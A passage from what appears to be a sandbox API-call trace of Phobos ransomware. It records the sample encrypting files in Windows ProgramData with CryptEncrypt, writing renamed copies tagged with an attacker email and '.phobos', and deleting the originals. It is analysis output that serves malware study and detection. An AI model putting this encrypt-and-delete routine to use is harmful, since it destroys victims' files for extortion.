(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.441] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.441] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0147.441] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0147.441] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.441] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2f5f0, lpOverlapped=0x0) returned 1 [0147.512] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f600, dwBufLen=0x2f600 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f600) returned 1 [0147.514] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2f600, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2f600, lpOverlapped=0x0) returned 1 [0147.518] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0147.518] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.518] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0147.518] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.518] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x162, lpOverlapped=0x0) returned 1 [0147.518] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.518] CloseHandle (hObject=0x188) returned 1 [0147.518] CloseHandle (hObject=0x140) returned 1 [0147.521] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db")) returned 0 [0147.521] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0147.524] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=28962) returned 1 [0147.524] CloseHandle (hObject=0x140) returned 1 [0147.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml")) returned 0x20 [0147.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0147.524] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.524] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.525] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0147.525] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.525] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7122, lpOverlapped=0x0) returned 1 [0147.728] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7130, dwBufLen=0x7130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7130) returned 1 [0147.728] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7130, lpOverlapped=0x0) returned 1 [0147.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.729] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.730] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0147.730] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.730] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0147.730] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.730] CloseHandle (hObject=0x140) returned 1 [0147.730] CloseHandle (hObject=0x188) returned 1 [0147.730] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml")) returned 1 [0147.732] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.836] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16880) returned 1 [0147.836] CloseHandle (hObject=0x138) returned 1 [0147.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html")) returned 0x20 [0147.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.837] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0147.837] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.837] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x41f0, lpOverlapped=0x0) returned 1 [0147.875] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4200, dwBufLen=0x4200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4200) returned 1 [0147.875] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4200, lpOverlapped=0x0) returned 1 [0147.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.877] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.877] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0147.877] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.877] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0147.877] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.877] CloseHandle (hObject=0x138) returned 1 [0147.877] CloseHandle (hObject=0x188) returned 1 [0147.878] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html")) returned 1 [0147.880] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.881] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6790) returned 1 [0147.881] CloseHandle (hObject=0x188) returned 1 [0147.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log")) returned 0x2020 [0147.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.881] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.881] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.881] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.882] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.883] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0147.883] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.883] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1a86, lpOverlapped=0x0) returned 1 [0147.885] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a90, dwBufLen=0x1a90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a90) returned 1 [0147.885] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a90, lpOverlapped=0x0) returned 1 [0147.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.886] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.886] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0147.886] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.886] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0147.886] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.886] CloseHandle (hObject=0x188) returned 1 [0147.886] CloseHandle (hObject=0x138) returned 1 [0147.887] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\unknown.log")) returned 1 [0147.888] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.888] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.889] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=199386) returned 1 [0147.889] CloseHandle (hObject=0x138) returned 1 [0147.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log")) returned 0x2020 [0147.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.889] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.889] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.889] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.889] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.890] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0147.890] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.890] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x30ada, lpOverlapped=0x0) returned 1 [0147.924] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30ae0, dwBufLen=0x30ae0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30ae0) returned 1 [0147.926] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x30ae0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x30ae0, lpOverlapped=0x0) returned 1 [0147.931] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.931] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.931] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0147.931] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.931] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0147.931] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.931] CloseHandle (hObject=0x138) returned 1 [0147.931] CloseHandle (hObject=0x188) returned 1 [0147.934] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log")) returned 1 [0147.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.936] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.937] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=89534) returned 1 [0147.937] CloseHandle (hObject=0x188) returned 1 [0147.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif")) returned 0x20 [0147.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.937] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.937] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.938] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=516424) returned 1 [0147.938] CloseHandle (hObject=0x188) returned 1 [0147.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg")) returned 0x20 [0147.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 